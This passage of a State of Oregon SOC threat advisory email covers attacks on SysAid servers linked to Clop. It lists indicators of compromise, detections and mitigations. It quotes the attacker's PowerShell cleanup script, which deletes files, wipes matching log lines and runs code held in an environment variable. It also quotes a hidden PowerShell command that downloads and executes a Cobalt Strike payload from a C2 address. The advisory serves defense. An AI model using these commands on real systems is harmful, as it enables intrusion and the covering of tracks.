<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i> Remove-Item -Path "$tomcat_dir\webapps\usersfiles\leave";<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i> sleep 5;<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i> cleanLL;<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i> break;<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>}<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>else {<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i> cleanLL;<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>}<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i><o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>$s=$env:SehCore;$env:SehCore="";Invoke-Expression $s;<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i><o:p> </o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">The script performs the following actions:<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<ul style="margin-top:0in" type="disc">
<li class="MsoListParagraph" style="margin-left:0in;mso-list:l0 level1 lfo8"><span style="mso-bookmark:_Hlk122600425">Sleeps for 5 seconds to allow time for the exploit to complete fully.<o:p></o:p></span></li><li class="MsoListParagraph" style="margin-left:0in;mso-list:l0 level1 lfo8"><span style="mso-bookmark:_Hlk122600425">Removes any lines in log files found within the SysAidServer\root\WEB-INF\logs and SysAidServer\tomcat\logs directories which match the following
patterns:<o:p></o:p></span></li><ul style="margin-top:0in" type="circle">
<li class="MsoListParagraph" style="margin-left:0in;mso-list:l0 level2 lfo8"><span style="mso-bookmark:_Hlk122600425">userentry|getLogo\.jsp|Got\ LDAP\ file|ldapSyms|usersfile|time=18686488731<o:p></o:p></span></li><li class="MsoListParagraph" style="margin-left:0in;mso-list:l0 level2 lfo8"><span style="mso-bookmark:_Hlk122600425">userentry|getLogo\.jsp|Got\ LDAP\ file|ldapSyms|usersfile|time=1868648873<o:p></o:p></span></li></ul>
</ul>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">The following PowerShell command was used to download and execute a CobaltStrike listener on victim hosts:<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://179.60.150[.]34:80/a')<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="background:yellow;mso-highlight:yellow"><o:p> </o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><b><u>Post-Exploit</u></b>: Indicators of compromise can be found below:<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">Hashes<o:p></o:p></span></p>
<table class="MsoTableGrid" border="1" cellspacing="0" cellpadding="0" style="border-collapse:collapse;border:none">
<tbody>
<tr>
<td width="78" valign="top" style="width:58.2pt;border:solid windowtext 1.0pt;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">Filename<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td width="476" valign="top" style="width:357.25pt;border:solid windowtext 1.0pt;border-left:none;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">Sha256<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td width="124" valign="top" style="width:92.75pt;border:solid windowtext 1.0pt;border-left:none;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">Comment<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
</tr>
<tr>
<td width="78" valign="top" style="width:58.2pt;border:solid windowtext 1.0pt;border-top:none;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">User.exe<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td width="476" valign="top" style="width:357.25pt;border-top:none;border-left:none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td width="124" valign="top" style="width:92.75pt;border-top:none;border-left:none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">Malicious loader<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
</tr>
</tbody>
</table>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><b>IP Addresses<o:p></o:p></b></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<table class="MsoTableGrid" border="1" cellspacing="0" cellpadding="0" style="border-collapse:collapse;border:none">
<tbody>
<tr>
<td width="132" valign="top" style="width:98.7pt;border:solid windowtext 1.0pt;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">IP<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td width="234" valign="top" style="width:175.5pt;border:solid windowtext 1.0pt;border-left:none;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">Comment<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
</tr>
<tr>
<td width="132" valign="top" style="width:98.7pt;border:solid windowtext 1.0pt;border-top:none;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">81.19.138[.]52<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td width="234" valign="top" style="width:175.5pt;border-top:none;border-left:none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">GraceWire Loader C2<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
</tr>
<tr>
<td width="132" valign="top" style="width:98.7pt;border:solid windowtext 1.0pt;border-top:none;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">45.182.189[.]100<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td width="234" valign="top" style="width:175.5pt;border-top:none;border-left:none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">GraceWire Loader C2<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
</tr>
<tr>
<td width="132" valign="top" style="width:98.7pt;border:solid windowtext 1.0pt;border-top:none;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">179.60.150[.]34<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td width="234" valign="top" style="width:175.5pt;border-top:none;border-left:none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">Cobalt Strike C2<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
</tr>
<tr>
<td width="132" valign="top" style="width:98.7pt;border:solid windowtext 1.0pt;border-top:none;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">45.155.37[.]105<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td width="234" valign="top" style="width:175.5pt;border-top:none;border-left:none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;padding:0in 5.4pt 0in 5.4pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">Meshagent remote admin tool C2<o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
</tr>
</tbody>
</table>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><b>File Paths<o:p></o:p></b></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="background:yellow;mso-highlight:yellow"><o:p> </o:p></span></span></p>
<table class="MsoNormalTable" border="0" cellspacing="0" cellpadding="0" width="780" style="width:585.0pt;background:#F9F9F9;border-collapse:collapse">
<tbody>
<tr>
<td style="border:solid windowtext 1.0pt;padding:6.0pt 6.0pt 6.0pt 6.0pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="color:black">Path</span><o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td style="border:solid windowtext 1.0pt;border-left:none;padding:6.0pt 6.0pt 6.0pt 6.0pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="color:black">Comment</span><o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
</tr>
<tr>
<td style="border:solid windowtext 1.0pt;border-top:none;padding:6.0pt 6.0pt 6.0pt 6.0pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="color:black">C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe</span><o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td style="border-top:none;border-left:none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;padding:6.0pt 6.0pt 6.0pt 6.0pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="color:black">GraceWire</span><o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
</tr>
<tr>
<td style="border:solid windowtext 1.0pt;border-top:none;padding:6.0pt 6.0pt 6.0pt 6.0pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="color:black">C:\Program Files\SysAidServer\tomcat\webapps\usersfiles.war</span><o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td style="border-top:none;border-left:none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;padding:6.0pt 6.0pt 6.0pt 6.0pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="color:black">Archive of WebShells and tools used by the attacker</span><o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
</tr>
<tr>
<td style="border:solid windowtext 1.0pt;border-top:none;padding:6.0pt 6.0pt 6.0pt 6.0pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="color:black">C:\Program Files\SysAidServer\tomcat\webapps\leave</span><o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
<td style="border-top:none;border-left:none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;padding:6.0pt 6.0pt 6.0pt 6.0pt">
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="color:black">Used as a flag for the attacker scripts during execution</span><o:p></o:p></span></p>
</td>
<span style="mso-bookmark:_Hlk122600425"></span>
</tr>
</tbody>
</table>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="background:yellow;mso-highlight:yellow"><o:p> </o:p></span></span></p>
<p class="MsoNormal" style="margin-bottom:12.0pt"><span style="mso-bookmark:_Hlk122600425"><b>Antivirus Detections<o:p></o:p></b></span></p>
<p class="MsoNormal" style="margin-bottom:12.0pt"><span style="mso-bookmark:_Hlk122600425">Microsoft Defender detects the components of this attack as the following threats:<o:p></o:p></span></p>
<ul style="margin-top:0in" type="disc">
<li class="MsoNormal" style="margin-bottom:12.0pt;mso-list:l7 level1 lfo9"><span style="mso-bookmark:_Hlk122600425">Trojan:Win32/TurtleLoader<o:p></o:p></span></li><li class="MsoNormal" style="margin-bottom:12.0pt;mso-list:l7 level1 lfo9"><span style="mso-bookmark:_Hlk122600425">Backdoor:Win32/Clop<o:p></o:p></span></li><li class="MsoNormal" style="margin-bottom:12.0pt;mso-list:l7 level1 lfo9"><span style="mso-bookmark:_Hlk122600425">Ransom:Win32/Clop<o:p></o:p></span></li></ul>
<p class="MsoNormal" style="margin-bottom:12.0pt"><span style="mso-bookmark:_Hlk122600425"><b>Post-Compromise Cleanup<o:p></o:p></b></span></p>
<p class="MsoNormal" style="margin-bottom:12.0pt"><span style="mso-bookmark:_Hlk122600425">After initial compromise, the attacker cleans up payloads used to establish an initial foothold on the infected servers, evidence of the following commands being run
on SysAid servers indicates successful exploitation:<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-bottom:12.0pt"><span style="mso-bookmark:_Hlk122600425">Remove-Item -Path “$tomcat_dir\webapps\usersfiles\leave”.<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-bottom:12.0pt"><span style="mso-bookmark:_Hlk122600425">Remove-Item -Force “$wapps\usersfiles.war”.<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-bottom:12.0pt"><span style="mso-bookmark:_Hlk122600425">Remove-Item -Force “$wapps\usersfiles\user.*”.<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-bottom:12.0pt"><span style="mso-bookmark:_Hlk122600425">& “$wapps\usersfiles\user.exe”.<o:p></o:p></span></p>
<p class="MsoNormal" style="margin-bottom:12.0pt"><span style="mso-bookmark:_Hlk122600425">As of November 13, 2023, there are no Tenable plugins for this vulnerability as well as no plugins in the pipeline.<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><b><u>Recommended Actions</u></b>:<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"> <o:p></o:p></span></p>
<ul style="margin-top:0in" type="disc">
<li class="MsoNormal" style="mso-list:l4 level1 lfo4"><span style="mso-bookmark:_Hlk122600425">Verify host has not been compromised before applying patches.<o:p></o:p></span></li><li class="MsoListParagraph" style="margin-left:0in;mso-list:l4 level1 lfo4"><span style="mso-bookmark:_Hlk122600425">Apply appropriate updates provided by vendor to vulnerable systems immediately after appropriate testing.<o:p></o:p></span></li><li class="MsoNormal" style="mso-list:l4 level1 lfo4"><span style="mso-bookmark:_Hlk122600425">Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.<o:p></o:p></span></li><li class="MsoNormal" style="mso-list:l4 level1 lfo4"><span style="mso-bookmark:_Hlk122600425">Apply the Principle of Least Privilege to all systems and services.<o:p></o:p></span></li></ul>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<span style="mso-bookmark:_Hlk122600425"></span>
<table class="MsoNormalTable" border="0" cellspacing="0" cellpadding="0" width="702" style="width:526.5pt;border-collapse:collapse">
<tbody>
<tr style="height:63.0pt">
<td width="118" valign="top" style="width:88.35pt;padding:0in 4.65pt 0in 4.65pt;height:63.0pt">
<p class="MsoNormal" style="line-height:105%"><span style="color:#1F497D"><img border="0" width="121" height="87" style="width:1.2583in;height:.9083in" id="Picture_x0020_4" src="cid:image001.png@01DA1614.36201480"><span style="mso-ligatures:none"><o:p></o:p></span></span></p>
</td>
<td width="493" valign="top" style="width:369.65pt;padding:0in 4.65pt 0in 4.65pt;height:63.0pt">
<p class="MsoNormal" style="line-height:105%"><b><span style="mso-ligatures:none">Cyber Security Services<o:p></o:p></span></b></p>
<p class="MsoNormal" style="line-height:105%"><span style="mso-ligatures:none">State of Oregon Cyber Security Services<o:p></o:p></span></p>
<p class="MsoNormal" style="line-height:105%"><span style="mso-ligatures:none">Enterprise Information Services | SOC<o:p></o:p></span></p>
<p class="MsoNormal" style="line-height:105%"><span style="mso-ligatures:none">Cyber Security Services (CSS)<o:p></o:p></span></p>
<p class="MsoNormal" style="line-height:105%"><span style="mso-ligatures:none">SOC Hotline: (503) 378-5930 | SOC Services (503) 373-0378<span style="color:#1F497D"><o:p></o:p></span></span></p>
</td>
</tr>
<tr>
<td width="611" colspan="2" valign="top" style="width:458.05pt;padding:0in 4.65pt 0in 4.65pt">
<p class="MsoNormal" style="line-height:105%"><i><span style="color:#2E74B5;mso-ligatures:none">“Ensuring user-friendly, reliable and secure state technology systems that serve Oregonians.”<o:p></o:p></span></i></p>
</td>
</tr>
</tbody>
</table>
<p class="MsoNormal"><o:p> </o:p></p>
<p class="MsoNormal"><o:p> </o:p></p>
</div>
</body>
</html>